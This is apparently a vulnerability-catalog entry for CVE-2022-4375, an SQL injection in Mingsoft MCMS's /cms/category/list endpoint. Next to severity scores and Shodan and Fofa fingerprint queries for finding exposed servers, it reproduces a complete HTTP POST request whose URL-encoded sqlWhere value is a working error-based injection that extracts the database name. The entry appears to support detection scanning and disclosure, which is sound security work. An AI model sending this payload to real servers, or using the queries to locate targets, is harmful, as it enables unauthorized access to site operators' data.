| Title | Mingsoft MCMS - SQL Injection |
|---|---|
| Author | ritikchaddha |
| Severity | Critical |
| Impact | Successful exploitation could lead to unauthorized access to sensitive data. |
| Remediation | Apply the vendor-supplied patch or update to the latest version. |
| CVSS Score | 9.8 |
| EPSS Score | 0.31675 |
| CVE ID | CVE-2022-4375 |
| CWE ID | CWE-89,CWE-707 |
| Shodan Query | http.favicon.hash:1464851260 |
| Fofa Query | icon_hash="1464851260" |
| Tags | cve cve2022 mingsoft mcms sqli vuln |
SQL injection vulnerability in Mingsoft MCMS up to 5.2.9 via the sqlWhere parameter in /cms/category/list.
GET / HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:1.9.7.20) Gecko/ Firefox/4.0
Connection: close
Accept-Encoding: gzip
POST /cms/category/list HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.6 Mobile/15E148 Safari/604.1
Connection: close
Content-Length: 465
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
sqlWhere=%5b%7b%22%61%63%74%69%6f%6e%22%3a%22%22%2c%22%66%69%65%6c%64%22%3a%22%65%78%74%72%61%63%74%76%61%6c%75%65%28%30%78%37%65%2c%63%6f%6e%63%61%74%28%30%78%37%65%2c%28%64%61%74%61%62%61%73%65%28%29%29%29%29%22%2c%22%65%6c%22%3a%22%65%71%22%2c%22%6d%6f%64%65%6c%22%3a%22%63%6f%6e%74%65%6e%74%54%69%74%6c%65%22%2c%22%6e%61%6d%65%22%3a%22%e6%96%87%e7%ab%a0%e6%a0%87%e9%a2%98%22%2c%22%74%79%70%65%22%3a%22%69%6e%70%75%74%22%2c%22%76%61%6c%75%65%22%3a%22%61%22%7d%5d
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-4375.yaml
🦈 Packet Capture: ⬇️ Download cve-2022-4375.pcap
N/AN/A